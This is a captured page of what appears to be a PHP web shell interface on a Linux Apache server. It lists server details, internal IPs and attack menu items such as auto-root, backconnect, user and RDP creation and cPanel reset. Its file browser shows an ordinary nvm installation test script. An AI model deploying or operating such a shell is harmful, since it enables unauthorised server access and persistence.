Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ayush23027 /
.nvm /
test /
installation_node /
[ HOME SHELL ]
Name
Size
Permission
Action
default-packages
2.6
KB
-rwxr-xr-x
install LTS
1.26
KB
-rwxr-xr-x
install already installed uses...
705
B
-rwxr-xr-x
install from binary
678
B
-rwxr-xr-x
install from binary with binar...
1.33
KB
-rw-r--r--
install from source
834
B
-rwxr-xr-x
install from source with threa...
950
B
-rwxr-xr-x
install from source without V8...
762
B
-rwxr-xr-x
install hook
1.37
KB
-rwxr-xr-x
install latest npm
2.38
KB
-rwxr-xr-x
install on bash with ERR trap ...
1005
B
-rwxr-xr-x
install two versions and use t...
682
B
-rwxr-xr-x
install version specified in ....
510
B
-rwxr-xr-x
install while reinstalling pac...
1.53
KB
-rwxr-xr-x
install with --alias
244
B
-rwxr-xr-x
install with --default
251
B
-rwxr-xr-x
install with --latest-npm
269
B
-rwxr-xr-x
setup_dir
62
B
-rwxr-xr-x
teardown_dir
268
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : install hook
#!/bin/sh die () { echo "$@" ; exit 1; } . ../../nvm.sh VERSION='v0.11.0' VERSION_PATH="$(nvm_version_path "${VERSION}")" succeed() { nvm_echo "$@" NVM_INSTALL_THIRD_PARTY_HOOK= nvm install "${VERSION}" } fail() { succeed "$@" return 11 } ! nvm_is_version_installed "${VERSION}" || nvm uninstall "${VERSION}" || die 'uninstall failed' # an existing but empty VERSION_PATH directory should not be enough to satisfy nvm_is_version_installed rm -rf "${VERSION_PATH}" mkdir -p "${VERSION_PATH}" nvm_is_version_installed "${VERSION}" && die 'nvm_is_version_installed check not strict enough' rmdir "${VERSION_PATH}" OUTPUT="$(NVM_INSTALL_THIRD_PARTY_HOOK=succeed nvm install "${VERSION}")" USE_OUTPUT="$(nvm use "${VERSION}")" EXPECTED_OUTPUT="${VERSION} node std binary ${VERSION_PATH} Downloading and installing node ${VERSION}... ${USE_OUTPUT}" [ "${OUTPUT}" = "${EXPECTED_OUTPUT}" ] || die "expected >${EXPECTED_OUTPUT}<; got >${OUTPUT}<" ! nvm_is_version_installed "${VERSION}" || nvm uninstall "${VERSION}" || die 'uninstall 2 failed' OUTPUT="$(NVM_INSTALL_THIRD_PARTY_HOOK=fail nvm install "${VERSION}" || echo 'failed')" USE_OUTPUT="$(nvm use "${VERSION}")" EXPECTED_OUTPUT="${VERSION} node std binary ${VERSION_PATH} Downloading and installing node ${VERSION}... ${USE_OUTPUT} failed" [ "${OUTPUT}" = "${EXPECTED_OUTPUT}" ] || die "expected >${EXPECTED_OUTPUT}<; got >${OUTPUT}<"
Close